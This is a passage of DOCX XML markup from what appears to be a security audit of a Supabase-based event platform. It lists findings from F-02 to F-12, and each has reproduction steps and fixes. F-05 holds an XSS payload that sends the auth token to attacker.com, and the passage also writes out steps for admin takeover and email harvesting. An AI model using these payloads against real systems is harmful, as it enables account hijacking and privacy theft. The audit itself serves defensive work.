          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">First admin claim is open to any user who registers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phase2_1_security_hardening.sql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58–85</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CWE-269</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There is a function called claim_first_admin() that grants admin rights to whoever calls it first — as long as no admin exists yet. The README even tells you about it. So if someone registers before the real admin does (which could easily happen on a freshly deployed site), they become admin and can promote their friends too.</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Read the README — it literally says "Admin status via claim_first_admin".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Register before the real admin gets around to it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Call: supabase.rpc("claim_first_admin")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Response: { success: true, message: "Admin claim successful" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Now promote another account: supabase.rpc("admin_set_user_admin", { target_user_id: ..., make_admin: true })</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Full admin takeover of the platform — can approve/reject events, manage all users, read all messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EFF6FF" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1e40af"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Note: I do want to say — the developer did use pg_advisory_xact_lock inside the function which prevents two people calling it at the exact same time (race condition). That was smart. The issue is just the deployment window before any admin exists.</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The safest fix would be to seed the first admin directly in the migration SQL using a known UUID, instead of having a callable function. If the RPC must exist, it should require a one-time secret token that is only known to the deployer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEE2E2" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-03  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Organizer's private email is visible to anyone who sends them a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phase4_messaging_contact_admin_helpers.sql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411–414 and 454</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CWE-359</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When a user sends a contact message to an event organizer, the function create_contact_message() fetches the organizer's email from the events table and stores it in the messages row. Because the RLS policy lets the sender read their own sent messages, they can just SELECT the organizer_email column from the messages table and get the organizer's personal email — even if the organizer never shared it publicly.</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Send a contact message to any event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Then run: supabase.from("messages").select("organizer_email").eq("sender_user_id", myUserId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. You get the organizer's personal email back.</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Privacy violation. Organizer emails can be harvested in bulk by looping over all event IDs and sending a contact message to each.</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Remove organizer_email from the messages table insert. It doesn't need to be stored there — it is already in the events table. If it is needed for backend notifications, handle it server-side only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEE2E2" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-04  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact messages can be sent to rejected or pending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phase4_messaging_contact_admin_helpers.sql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410–415</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CWE-284</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create_contact_message() function looks up the event by ID but does NOT check whether the event is approved. This means users can send messages to organizers of events that were rejected or are still pending. This could be used to spam organizers.</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Find the ID of a pending or rejected event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Call create_contact_message() with that event_id.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. The message is created and the organizer receives it even though their event is not approved.</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Organizers of rejected events can be mass-spammed. Also lets users confirm that a specific event UUID exists even if it is not publicly visible.</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 status check in the event lookup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE e.id = event_id_param AND e.status = 'approved' AND coalesce(e.is_draft, false) = false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEE2E2" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-05  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No Content Security Policy (CSP) header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index.html + vite.config.ts</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CWE-693</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I checked index.html and vite.config.ts and there is no Content Security Policy set anywhere. This is a standard browser security header that prevents injected scripts from running. Without it, if someone finds an XSS vulnerability in the app (e.g. in event titles or message content), they can steal the user's session token from localStorage because there is nothing stopping the browser from running the malicious script.</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Find any place that renders user input unsanitized (e.g. dangerouslySetInnerHTML).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Inject: &lt;img src=x onerror="fetch('https://attacker.com/?t='+localStorage.getItem('sb-TOKEN-auth-token'))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Without CSP, the browser runs the script. Session token is stolen.</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Session hijacking — attacker gets full access to the victim's account.</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 CSP header at the hosting level. A basic one for this app would be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">default-src 'self'; script-src 'self'; connect-src 'self' https://*.supabase.co</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Also add X-Frame-Options: DENY and X-Content-Type-Options: nosniff.</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F-06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Email validation is way too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 + phase6_4_fix_create_contact_message.sql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 L405 / phase6_4 L32</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In both versions of create_contact_message(), the email check is just: position('@' in clean_email) = 0. This only checks if there is an @ symbol anywhere in the string. So "a@", "@@@", "notanemail@" all pass. These get stored in the database as valid email addresses.</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Call create_contact_message() with sender_email = "@"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Validation passes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. "@" is stored as the sender's email in the messages table.</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Garbage data in the database. If the app ever tries to send emails to these addresses it will fail silently. Could also cause issues with any future email notification system.</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Replace the check with a proper regex:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">clean_email ~ '^[^@\s]+@[^@\s]+\.[^@\s]+$'</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F-07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No limit on how many replies a user can send in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phase4_messaging_contact_admin_helpers.sql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539–541</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CWE-400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send_contact_reply() function just keeps appending to a JSONB array in the messages table with no limit on how many replies there can be. A user who is part of a conversation (sender or organizer) can just keep calling it in a loop, making the database row grow bigger and bigger. This could slow down the admin dashboard and waste storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Reproduce / Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Send a contact message to become a conversation participant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Write a loop that calls send_contact_reply() hundreds or thousands of times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. The messages row grows to many MB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Admin page that loads conversations becomes very slow.</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Potential denial-of-service against the admin messaging interface. Wasted database storage.</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 check at the start of send_contact_reply():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IF (SELECT jsonb_array_length(replies) FROM messages WHERE id = target_message_id) &gt;= 500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN RAISE EXCEPTION 'Reply limit reached';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">END IF;</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F-08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Migration ordering creates a security gap if phase3_2 is not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phase3_1 vs phase3_2</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phase3_1 L60–72</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CWE-732</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phase3_1 creates the rsvp_counts_by_event_ids() function without any event status filter — meaning it returns RSVP counts for pending and rejected events too. phase3_2 fixes this by adding a status filter. But if someone only runs phase3_1 (or accidentally re-runs it after phase3_2), the broken version comes back and leaks data about non-public events.</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Information leakage — users can check RSVP counts for events that are not approved yet, which confirms those events exist.</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Merge phase3_1 and phase3_2 into a single migration that has the secure version from the start. There is no reason they need to be separate.</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F-09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No character limits on text fields like event title, description, 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phase1 + phase3_1 + phase4</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Multiple</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Text columns like events.title, events.description, events.venue_name, messages.subject, and messages.message have no length limits at the database level. A user could submit a 10MB event description and it would be stored. This wastes storage and could slow down queries.</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Storage abuse, potential query performance issues, unexpected behavior in the frontend if it tries to display very long strings.</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CHECK constraints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK (length(title) &lt;= 200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK (length(description) &lt;= 10000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use VARCHAR(200) instead of TEXT for bounded fields.</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F-10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No record of who changed admin rights or approved/rejected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 + phase6_3 (admin RPCs)</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All admin functions</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CWE-778</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Admin functions like admin_set_user_admin() and admin_update_event_status() make important changes but do not write any log anywhere. If something goes wrong — like an account being wrongly banned or an event being approved that shouldn't have been — there is no way to check who did it or when.</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No accountability for admin actions. Makes debugging and security incident investigation impossible.</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Create a simple admin_audit_log table with columns: action, performed_by, target_id, old_value, new_value, created_at. Insert a row at the end of each admin function.</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F-11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Other important HTTP security headers are also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index.html / hosting config</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CWE-1021</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Besides the CSP (covered in F-05), there is also no X-Frame-Options header (protects against clickjacking — someone embedding the app in an invisible iframe to trick users into clicking things), no X-Content-Type-Options: nosniff (stops browser from guessing file types), and no Referrer-Policy (prevents leaking internal URLs to third parties).</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Clickjacking attacks, MIME sniffing attacks, internal URL leakage.</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at hosting level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F1F5F9" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF3C7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-12  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No CI/CD pipeline — nobody is automatically checking for security issues on new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.github/ (no workflow files found)</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CWE-1104</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There are no GitHub Actions workflows in the repo. This means every time code is pushed, nobody is automatically running npm audit to check for known vulnerabilities in the 30+ dependencies, or running type checks, or running the smoke tests. Security issues could creep in silently.</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Known CVEs in dependencies could go unnoticed. Regressions are not caught automatically.</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 simple GitHub Actions workflow file (.github/workflows/ci.yml) that runs: npm ci, npm run build, npm audit --audit-level=high, and the existing smoke test script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E5E7EB" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="DCFCE7" w:val="clear"/>
        <w:spacing w:before="180" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  F-13  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
